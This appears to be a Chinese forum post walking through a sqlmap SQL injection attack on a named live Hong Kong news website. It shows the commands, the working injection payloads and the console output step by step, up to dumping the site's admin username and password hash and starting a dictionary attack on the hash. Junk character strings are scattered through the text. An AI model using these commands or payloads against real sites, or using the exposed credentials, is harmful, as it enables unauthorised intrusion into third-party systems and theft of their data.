sqlmap实例注入mysql

admin

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 |9 U* ^: v) o3 k) ^& M8 i( N- Dms "Mysql" --current-user       /*  注解：获取当前用户名称
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54
9 r( T) @! t+ f4 A6 H[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
( @8 P/ E4 G7 c* l! n[16:53:54] [INFO] resuming injection data from session file
" f- M! y! q) r& y" n[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
1 H8 g' \# v/ Asqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ r$ q  \! D8 `% Z6 |, t5 y4 Psts:
---
Place: GET
4 y$ R  t$ ]$ ]2 F; R* `Parameter: id
; t9 i5 E- a) I, E    Type: boolean-based blind
( j" L" o6 J7 ]7 Y) R    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
/ i5 f4 O. a+ j, F! h8 ?    Type: error-based
4 Z, w+ D# `) q+ [0 P! @0 W    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
# F6 @- ]$ f4 M' q7 l3 D! `    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 j6 l2 c# X3 ]; S, l: E120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ G9 y! L6 V# O5 e+ Q1 g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
% t5 B8 J8 \  _# C- n    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ @. h, F# y2 X- X- z8 f% g- f* t; h(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! U( h* C4 A" n* {( P! ?) O  c    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
9 o" u) a4 Q. \* R0 R  D5 L+ J    Payload: id=276 AND SLEEP(5)
5 P& o& q, r' o---
* C" p. p1 B7 V/ x$ O" ~* O[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
  x, L3 U* i6 F4 U" L1 W9 m: N( |web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
5 f2 K5 P9 {1 _% v[16:53:55] [INFO] fetching current user
current user:    'root@localhost'   
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'

shutting down at: 16:53:58

' f  h4 H( {* M. K8 c- U* _# s0 mD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
1 c; h# ~$ V! ~* S/ F% D# rms "Mysql" --current-db                  /*当前数据库
    sqlmap/0.9 - automatic SQL injection and database takeover tool
+ [' Z1 @) v8 h    http://sqlmap.sourceforge.net

starting at: 16:54:16
9 j1 y4 ~/ S, X" D0 V+ }[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
  J: I0 N5 r5 P, \+ a* Q[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
& q4 Q. K& k$ [* Q7 ssts:
% j; s4 Z8 y9 @) p3 F* r---
6 b$ a! M) a5 c0 [5 pPlace: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
+ p9 }- I- p0 g  O* s& }* `% q    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3 e  U* Z  R' w    Type: UNION query
* c# T1 V& Z1 r: T, i  V1 H    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
; b5 a2 g; `. Z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ ]% e. u; J3 A! u; k/ e. oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
  [7 A& B) M: V/ Q3 c' {    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
$ a( |6 }  d! q; t" A    Payload: id=276 AND SLEEP(5)
8 Q, m. _3 l: r: I---
1 s: P" a4 P- P[16:54:17] [INFO] the back-end DBMS is MySQL
$ N6 G( r: \0 ^web server operating system: Windows
" I8 c$ {+ y8 Jweb application technology: Apache 2.2.11, PHP 5.3.0
9 r, F  f8 C. [4 {( ?# @back-end DBMS: MySQL 5.0
! ^: k  v# f! o, D[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'

shutting down at: 16:54:18
- h+ T, g( w2 Y1 _' r" iD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25
/ _. J# G/ D4 o' D3 e4 @[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% ~$ n% N  k+ q, Z session file
/ i) q! W7 J  _( A% ^[16:55:25] [INFO] resuming injection data from session file
9 a  S( ^9 \. L7 J; L[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 @$ N5 Y+ b  V& H" Y! P8 A( L[16:55:25] [INFO] testing connection to the target url
% p$ v( X3 Z$ f! _0 `2 i2 dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
+ M/ B4 m) p3 {' h# s' y3 HPlace: GET
1 f  C+ I  C- D. i) wParameter: id
    Type: boolean-based blind
3 ]- U; a/ k6 S1 A    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
* u( G# a* O" ^) d! K- {/ P$ W    Type: error-based
/ f7 T# q3 T5 w    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- B2 L) U! _  m7 H! ?7 A* Z9 i$ r    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 L1 n1 j1 ?6 ^6 A& y: z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
/ M& e& ^& V: |+ A2 p: `    Type: UNION query
( N) s, C5 X% U# Z4 R& Y+ M    Title: MySQL UNION query (NULL) - 1 to 10 columns
$ M) w+ T6 L+ k    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ J2 x6 f/ B( u7 `$ ACHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
% H. C( I6 A# _9 _$ d8 p    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
  o7 M1 D2 [! h+ u) E0 J, |. Z9 U1 ]8 \    Payload: id=276 AND SLEEP(5)
0 [( z4 [" M; Y( B5 N---
[16:55:26] [INFO] the back-end DBMS is MySQL
: A2 l1 B. V- kweb server operating system: Windows
% A$ w3 J3 ~* K' x: D% Q. M& t+ r, A+ mweb application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
" T2 s! Q: J) |' _$ w[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
. p) o: U4 r! t$ X& Y[6 tables]
- K; n' }5 J/ H" F+ X3 _+-------------+
* _* F4 L. E& p& N; m9 B| admin       |
| article     |
| contributor |
| idea        |
| image       |
" ^. H+ z) p1 y| issue       |
' b" X8 \2 [0 M/ v+-------------+
: U$ M* |* p1 f, R+ F3 C, q% c[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
9 Q, u" q) |# y$ u: Y5 O- D    http://sqlmap.sourceforge.net

starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
1 F* j% N3 P. K4 ^sts:
---
* [" T, Z' ]. ?& C0 s, QPlace: GET
  N0 W0 ~. G3 \. ]Parameter: id
    Type: boolean-based blind
- w" O+ }2 y/ \2 m. J% D    Title: AND boolean-based blind - WHERE or HAVING clause
' j, P% q1 ]4 u& g( p0 y    Payload: id=276 AND 799=799
/ q, X6 s( E* I5 ?! @    Type: error-based
8 t$ \. V$ {! G: ]% ?    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
3 k8 `! _. U5 @4 K: h2 y! _    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" h2 o0 f+ A' X7 z6 m( ^; M) C/ F(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. p+ ?" L) I! \$ ECHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& O. A+ ]* x4 J' i7 b1 Z1 l4 W. C# m    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
* T, D0 P: R9 {' @5 r5 N0 e---
web server operating system: Windows
+ ]/ c' s+ ~- B1 ~. s5 N5 J7 }web application technology: Apache 2.2.11, PHP 5.3.0
  W- F9 f' H0 q# n( aback-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
0 g8 C% j* R2 h# j! v, d6 C# Zssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
1 g5 ~/ n, l& e* h+----------+-------------+
| Column   | Type        |
+----------+-------------+
8 \0 p# _. y+ l| id       | int(11)     |
; P! G, }$ l. o% n2 [& F. m| password | varchar(32) |
9 D# T9 H! V  ]6 L  ?| type     | varchar(10) |
2 Q( x$ {, k% o) C! @| userid   | varchar(20) |
+----------+-------------+
9 n0 D' X' I& q5 e4 M

shutting down at: 16:56:19
2 O% Q: w0 A/ }* _4 r( f4 p# i
$ @) M2 z) z/ C& \0 UD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# J( ~* J3 [6 B) k* U8 M) ]+ qms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
" u0 W- \! o9 Y4 K7 j' B    sqlmap/0.9 - automatic SQL injection and database takeover tool
: _& u; p* y3 W  N- x  ]! g    http://sqlmap.sourceforge.net

starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
4 n5 @9 `* k* n, N' z---
; y( t" |( \/ kPlace: GET
# c$ W4 F9 F( O# s& RParameter: id
    Type: boolean-based blind
  [# }$ Y- w& V. l: J9 p    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
, J/ {' @- f! M8 v& H' U  J3 [4 h    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
5 n& N/ J8 n9 s  s3 E/ N1 A: D, Y+ O( Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
& l6 f# u3 u/ D),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ @  p' p$ \9 }% N8 z    Type: UNION query
0 X3 }) h0 g, D) b& M    Title: MySQL UNION query (NULL) - 1 to 10 columns
' {) _) L/ [& Z) O! ~- e    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" }3 C( H! o2 P(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
) q. t2 e' {7 J0 m+ R; \    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
8 ?0 I: J" n4 j6 r% ]n retrieved table items? [Y/n/q] y
" F, w- k0 v; `, P& S3 m$ Qwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
! C9 a% M# `& ]' t1 H6 [do you want to use common password suffixes? (slow!) [y/N] y
8 i1 e3 H: G9 P* [6 D/ ADatabase: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
3 g9 K$ C8 d- i" l| password                         | userid     |
+----------------------------------+------------+
3 k( S; o9 P9 @" r! b2 {7 l| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
- ]6 ~+ O1 `! k% P+ @& {

shutting down at: 16:58:14
4 G9 m. n2 R  k/ w  n' D. h
3 ^. C* N0 g% d; r4 FD:\Python27\sqlmap>